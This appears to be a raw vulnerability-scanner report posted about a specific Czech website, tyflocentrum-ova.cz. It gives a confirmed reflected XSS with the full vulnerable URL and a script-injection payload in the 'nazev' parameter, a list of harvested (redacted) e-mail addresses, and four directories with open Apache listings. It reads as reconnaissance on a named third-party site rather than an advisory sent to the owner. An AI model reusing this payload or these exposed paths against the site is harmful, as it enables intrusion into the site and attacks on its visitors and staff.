tyflocentrum-ova.cz

1. http://www.tyflocentrum-ova.cz
2.  
3. XSS (Cross-site Scripting)
4.  
5. Severity : Important
6. Confirmation : Confirmed
7. Detection Accuracy :
8. Vulnerable URL : http://www.tyflocentrum-ova.cz/galerie2.php?cesta=2011/mikulas&nazev='"--></style></script><script>alert(0x000C50)</script>
9. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
10. Parameter Name: nazev
11. Parameter Type: Querystring
12. Attack Pattern: '"--></style></script><script>alert(0x000C50)</script>
13.  
14. ||| E-mail Address Disclosure
15.  
16. Vulnerable URL : http://www.tyflocentrum-ova.cz/sluzba-osp-2010.php
17. Found E-mails:
18. [email protected]
19. [email protected]
20. [email protected]
21. [email protected]
22. [email protected]
23. [email protected]
24. [email protected]
25. [email protected]
26.  
27. ||| Directory Listing (Apache)
28.  
29. Severity : Information
30. Confirmation : Confirmed
31. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-127 CWE-548
32.  
33. http://www.tyflocentrum-ova.cz/download/
34. http://www.tyflocentrum-ova.cz/bariery/
35. http://www.tyflocentrum-ova.cz/kontakty/
36. http://www.tyflocentrum-ova.cz/dokumenty/